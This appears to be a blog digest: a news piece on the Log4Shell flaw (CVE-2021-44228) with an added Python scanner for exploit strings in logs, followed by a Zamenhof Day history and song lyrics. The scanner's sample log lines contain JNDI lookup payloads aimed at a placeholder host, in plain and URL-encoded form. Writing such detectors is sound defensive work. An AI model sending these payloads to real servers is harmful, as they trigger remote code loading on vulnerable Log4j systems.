Log4Shell is the new zero-day flaw: a bug present in most applications, and very easily exploitable

Log4Shell is a new zero-day vulnerability discovered last Thursday when it was exploited to remotely compromise Minecraft servers. The vulnerability is tracked as CVE-2021-44228 and was assigned a severity level of 10 out of 10, as it can be exploited very easily and allows unauthenticated remote code execution.

The vulnerability specifically affects Log4j, an open source, Java-based event logging tool from Apache that is used by hundreds of thousands of apps, especially in the cloud, including those commonly used in almost all companies on the planet.

Event logging is a process by which applications keep an up-to-date list of the activities performed and which can thus be analyzed later in the event of errors. Almost all network security systems run some kind of event log, which gives libraries such as Log4j nearly endless coverage.

The vulnerability is exploited by getting a special sequence of characters written to the log, as Cloudflare illustrated in detail in its analysis. And, as mentioned, the vulnerability can be exploited with ease: in the case of Minecraft, for example, it was possible to get the sequence of characters written to the log simply by sending a message in the in-game chat.

Since the compromise of the Minecraft servers, the security company GreyNoise has detected active scanning on the Internet attempting to identify vulnerable servers. The researchers note that the vulnerability is being exploited for various purposes: from the installation of malware to cryptomining, to the hardening of Linux botnets, as well as the extraction of data and configurations.
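
Because the trigger is a character sequence that ends up in a log, existing logs can be searched for it. The scanner below is an added example, not code from this article or from Cloudflare or GreyNoise. It assumes the `${jndi:` lookup prefix from the public description of CVE-2021-44228 (the article does not quote the sequence), and the log lines, hosts and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Lookup prefix from the public description of CVE-2021-44228 (assumption: not quoted on this page).
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# A lookup nested inside another lookup, which can hide the prefix from a plain string match.
NESTED = re.compile(r"\$\{[^}]*\$\{")

def normalize(line: str) -> str:
    """URL-decode up to three times so %24%7B... forms become ${... again."""
    for _ in range(3):
        decoded = unquote(line)
        if decoded == line:
            break
        line = decoded
    return line

def classify(line: str) -> str:
    """Return 'jndi-lookup', 'nested-lookup' or 'clean' for one log line."""
    text = normalize(line)
    if JNDI.search(text):
        return "jndi-lookup"
    if NESTED.search(text):
        return "nested-lookup"
    return "clean"

def scan(lines):
    """Return (line_number, verdict, line) for every line that is not clean."""
    hits = []
    for n, line in enumerate(lines, 1):
        verdict = classify(line)
        if verdict != "clean":
            hits.append((n, verdict, line))
    return hits

# Constructed sample log lines; addresses, hosts and paths are placeholders.
SAMPLE_LOG = [
    '10.0.0.5 "GET /index.html" 200 ua="Mozilla/5.0"',
    '10.0.0.9 "GET /" 200 ua="${jndi:ldap://example.invalid/a}"',
    '10.0.0.9 "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fexample.invalid%2Fa%7D" 404 ua="-"',
    '10.0.0.7 "GET /" 200 ua="${${a}b:placeholder}"',
    '[chat] <player1> price is ${amount} today',
]

if __name__ == "__main__":
    for n, verdict, line in scan(SAMPLE_LOG):
        print(f"line {n}: {verdict}: {line}")
```

A hit shows that the sequence reached a log, not that the server was compromised; each hit still has to be correlated with outbound connections and the Log4j version in use.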

15th December (’21): Zamenhof Day

Zamenhof Day (Esperanto: Zamenhofa Tago, Polish: Dzień Zamenhofa), also called Esperanto Book Day, is celebrated on 15 December, the birthday of Esperanto creator L. L. Zamenhof. It is the most widely celebrated day in Esperanto culture. On this day, Esperantists hold information sessions and cultural gatherings to promote literature in Esperanto.

The history of celebrating Esperanto on Zamenhof’s birthday can be traced back to 17 December 1878, when at a birthday party for his 19th birthday he presented to his friends his Lingwe uniwersala, the first version of his international language. By 1887, this language had evolved into what is now recognized as Esperanto when he published the Unua Libro. 15 December previously used to be also known as Esperanto Day, but that is now celebrated on 26 July, the day Unua Libro was published.

15 December 2009 marked 150 years since Zamenhof’s birth, and there were several events to celebrate. On this date, the authorities in his home town of Białystok, Poland, opened a new Zamenhof Center, and a symposium honoring Zamenhof was held in New York City, featuring talks by Arika Okrent and Humphrey Tonkin among other professors.

Also on this date, the search engine Google, in 33 national language versions (but not the international English one), bore a special version of their logo (a Doodle) emblazoned with the Esperanto flag in honor of the occasion, which generated, on the 30 biggest Wikipedia languages, 1,750,000 page views on the articles “L. L. Zamenhof”.

♬ ZUCCHERO – The Scientist


LYRIC
Come up to meet you
Tell you I’m sorry
Don’t know how lovely you are
I had to find you
Tell you I need you
Tell you I set you apart

Tell me your secrets
And ask me your questions
Oh, let’s go back to the start
Running in circles
Coming up tails
Heads on a science apart

Nobody said it was easy
It’s such a shame for us to part
Nobody said it was easy
No one ever said it would be this hard
Oh, take me back to the start

I was just guessing
At numbers and figures
Pulling your puzzles apart
Questions of science
Science and progress
Don’t speak as loud as my heart

Tell me you love me
Come back and haunt me
Oh, and I rush to the start
Running in circles
Chasing our tails
Coming back as we are

Nobody said it was easy
It’s such a shame for us to part
Nobody said it was easy
No one ever said it would be so hard
I’m going back to the start